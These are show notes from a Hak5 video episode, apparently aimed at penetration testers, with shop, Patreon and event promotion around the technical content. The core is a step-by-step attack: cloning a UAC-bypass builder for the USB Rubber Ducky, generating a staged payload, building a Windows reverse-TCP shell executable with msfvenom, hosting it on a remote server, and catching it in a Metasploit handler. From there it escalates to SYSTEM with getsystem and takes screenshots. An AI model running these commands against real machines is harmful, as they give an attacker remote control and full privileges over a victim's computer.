Privilege escalation on Windows, Meterpreter Reverse Shells and Staged Payloads with the USB Rubber Ducky. All that and more, this time on Hak5.
——————————-
Shop: http://www.hakshop.com
Support: http://www.patreon.com/threatwire
Subscribe: http://www.youtube.com/hak5
Our Site: http://www.hak5.org
Contact Us: http://www.twitter.com/hak5
——————————
Check out http://www.patreon.com/threatwire for our Patreon-only Audio RSS feed of Threat Wire!
git clone https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
cd UAC-D-E-Rubber-Ducky
python uac-duck.py
Upload UAC-Duck-Payload.vbs to your host
Create the inject.bin payload file from our DuckyScript.txt using ducktoolkit.com and load it on the MicroSD card for the USB Rubber Ducky
We’ll be using msfvenom to generate an executable reverse shell. Mubix has covered this in greater detail on Metasploit Minute – so check those episodes out.
msfvenom -a x86 –platform windows -p windows/shell/reverse_tcp LHOST=192.168.230.133 LPORT=4444 -f exe -o bob.exe
Next we’ll upload it to the online host we specified in the python builder script
msfconsole
use exploit/multi/handler
set LHOST 192.168.230.133
set LPORT 4444
set ExitOnSession false
exploit -j
sessions
sessions -i 1
shell
whoami
exit
getsystem
shell
whoami
exit
screenshot
https://github.com/SkiddieTech/UAC-D-E-Rubber-Ducky
Enter our December giveaway! Details here: https://hakshop.com/pages/watchdogs2_giveaway
Shannon’s going to CES! Gonna have a meetup during the trade show in Vegas: https://www.facebook.com/TekThing/photos/a.314494088749101.1073741828.304982593033584/598542447010929/?type=3&theater
We will be at Shmoocon! http://shmoocon.org/